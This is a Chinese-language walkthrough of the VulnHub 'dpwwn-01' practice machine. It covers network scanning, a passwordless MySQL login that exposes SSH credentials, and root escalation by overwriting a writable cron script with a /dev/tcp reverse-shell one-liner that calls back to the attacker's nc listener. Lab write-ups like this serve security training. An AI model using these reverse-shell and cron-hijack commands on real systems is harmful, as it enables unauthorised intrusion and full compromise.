环境配置

靶机下载地址:

https://download.vulnhub.com/dpwwn/dpwwn-01.zip


下载好解压打开.vmx文件即可

dpwwn-01_数据库

启动后如图:

dpwwn-01_shell脚本_02

无法直接获得靶机ip,用kali扫ip

netdiscover -r 192.168.164.0/16


ip信息:

kali:192.168.164.137

靶机:192.168.164.181

dpwwn-01_数据库_03

渗透测试

拿到靶机的ip后,进行端口扫描

nmap -sS -sV -T5 -A -p- 192.168.164.181


dpwwn-01_定时任务_04

发现靶机开启22、80、3306这3个端口。

其中3306是数据库端口,尝试无密码连接试一下。

dpwwn-01_shell脚本_05

直接进入。

查找一下可用信息

看到ssh数据库中有用户表,其中有用户密码信息:

dpwwn-01_bash_06

username:mistic
password:testP@$$swordmistic


将获得的信息尝试ssh连接

连接成功

dpwwn-01_shell脚本_07

查看不是root权限

dpwwn-01_数据库_08

尝试提权

发现/home/mistic/logrot.sh每3分钟执行一次

dpwwn-01_数据库_09

而且/home/mistic/logrot.sh具有写的权限

dpwwn-01_数据库_10

制作反弹shell脚本内容

并在kali攻击机上开启nc监听,nc -lvp 1234

在靶机上执行命令,制作反弹shell写入logrot.sh文件中

echo '0<&172-;exec 172<>/dev/tcp/192.168.164.137/1234;sh <&172 >&172 2>&172' > logrot.sh


把反弹shell脚本内容写入定时任务脚本文件,

dpwwn-01_root权限_11

dpwwn-01_bash_12

接下来就是写一个定时任务,再开一个nc监听,把/bin/bash反弹回来,就可以获得root的shell了

dpwwn-01_数据库_13

等待一会儿,就看到反弹shell过来了,id看一下,确认是root,完成。

dpwwn-01_shell脚本_14

进入root目录下,获取flag

dpwwn-01_数据库_15